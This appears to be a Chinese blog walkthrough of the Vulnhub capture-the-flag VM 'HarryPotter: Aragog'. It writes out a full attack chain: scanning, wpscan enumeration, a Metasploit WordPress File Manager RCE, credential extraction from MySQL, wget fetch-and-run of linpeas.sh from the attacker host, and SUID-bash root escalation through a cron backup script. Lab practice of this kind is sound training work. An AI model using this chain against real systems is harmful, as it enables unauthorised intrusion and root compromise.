看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,先来第一个Aragog老样子需要获得root权限找到flag(这里是魂器)即可。



image.png

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

Vulnhub靶机漏洞详解:


①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103



发现开启了2280端口,先访问一下哈利波特(经典再现)🆗还是老样子dirb、dirsearch、whatweb、gobuster、nikto



这里我们扫到了一堆/blog/子目录还有后台一看就是WordPress的cms的框架🆗 这里可以使用一个工具 wpscan


②:漏洞发现:

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等,Kali Linux默认自带了WPScan 可以-h查看具体用法参数

wpscan --api-token=自己的值 --url=http://192.168.0.103/blog -e vp  #记得自己注册个账号拿api-token的值 不然扫描不会显示漏洞信息的



cb1dd3c97de04bf3b527e3e14355d2e8.png

其实就有关于file Manager的 我们可以使用MSF去测试一下

③:漏洞利用:
search wordpress file manager #搜索manager相关漏洞信息
use  exploit/multi/http/wp_file_manager_rce #使用模块
show options  #查看需要的设置的参数
set RHOST 192.168.0.103  #设置靶机ip
set LHOST 192.168.0.105   #设置本地ip
set payload  #可以设置 可以不设
set TARGETURI /blog
run  #运行即可


5b59e523dd504fc58bfe9e207d0f4845.png

8bbb7051697c46c8877e7206caca4f31.png

🆗这里就渗透进来了,在/home 下面的 hagrid98文件下发现第一个魂器base64解码即可。



④:数据库语句查询:

🆗这里我们找到了第一个魂器 使用 getuid 发现权限比较低 这里我们的思路就是需要提权操作了!


思路:wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php


得到账号和密码:root/mySecr3tPass

python3 -c 'import pty; pty.spawn("bin.bash");'  #开启交互
mysql -u root -p  #登入数据库
show databases;  #列出库
use wordpress;  #使用wordpress库
show tables;  #查询表
select * from wp_users; #查询表内容


5331ec5d7d724559a8157b402ffab083.png



ad7d459171944552849b670a40f795bb.png

286b3a2a4b9c43b6ac04b7679326c90b.png

81cb12bba33c425d8a861eb578688b26.png


然后MD5解码得到密码:password123

MD5在线解密:https://www.somd5.com/


⑤:SSH登入:

得到了账号密码:hagrid98/password123 尝试登入,登入成功!!!


⑥:备份文件提权:

这里需要下载 linpeas.sh 用于辅助提权的开启临时网页:python3 -m http.server 9000 在使用wget下载到靶机

linpeas.sh下载地址:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget http://192.168.0.105:9000/linpeas.sh  #wget 下载到靶机
chmod 777 linpeas.sh # 给个权限
./linpeas.sh #运行 进行扫描

54a907335c094ab7a5e0805ffa1e73df.png


d67140bdd42b4ae1bdf15623d8a96fef.png

扫描发现有backup备份文件,这个脚本的意思就是把上传的文件复制到/tmp 然后过段时间会执行。


这里可以继续传pspy64用来看定时任务的(我懒得传了,大晚上肝文章要睡觉着了)直接为可以执行bash就行了

chmod +s /usr/bin/bash #给个权限
/usr/bin/bash -p  #执行bash


⑦:获取FLAG:



base64解码即可。



剩下得魂器 下次探索吧!已经凌晨 20分钟了 狗命要紧!!

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:


这个靶机难度高,主要i是最后得提权吧


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等

2.数据库的基本操作 查询语句 select * from python3开启交互 以及开临时网页(最基本的讲过很多次了)

3.wpscan工具的使用 探测WordPress 框架

4.MSF框架:exploit/multi/http/wp_file_manager_rce的使用

5.linpeas.sh辅助提权的使用,查询定时任务pspy64 备份文件提权


HarryPotter系列第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

目录
打赏
0
0
0
0
92
分享
相关文章
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
105 4
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
136 4
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
93 2
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
143 0
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
119 0
Jmeter工具使用:HTTP接口性能测试实战
希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试,有兴趣的话,你可以研究更多关于JMeter的内容。记住,只有理解并掌握了这些工具,你才能充分利用它们发挥其应有的价值。+
285 23
接口测试新选择:Postman替代方案全解析
在软件开发中,接口测试工具至关重要。Postman长期占据主导地位,但随着国产工具的崛起,越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数,还具备强大的可视化操作、自动生成文档和API调试功能,极大简化了开发流程。
2025接口测试全攻略:高并发、安全防护与六大工具实战指南
本文探讨高并发稳定性验证、安全防护实战及六大工具(Postman、RunnerGo、Apipost、JMeter、SoapUI、Fiddler)选型指南,助力构建未来接口测试体系。接口测试旨在验证数据传输、参数合法性、错误处理能力及性能安全性,其重要性体现在早期发现问题、保障系统稳定和支撑持续集成。常用方法包括功能、性能、安全性及兼容性测试,典型场景涵盖前后端分离开发、第三方服务集成与数据一致性检查。选择合适的工具需综合考虑需求与团队协作等因素。
326 24
除了postman还有什么接口测试工具
最好还是使用国内的接口测试软件,其实国内替换postman的软件有很多,这里我推荐使用yunedit-post这款接口测试工具来代替postman,因为它除了接口测试功能外,在动态参数的支持、后置处理执行sql语句等支持方面做得比较好。而且还有接口分享功能,可以生成接口文档给团队在线浏览。
162 2
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
189 10
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡

热门文章

最新文章

AI助理
登录插画

登录以查看您的控制台资源

管理云资源
状态一览
快捷访问

你好,我是AI助理

可以解答问题、推荐解决方案等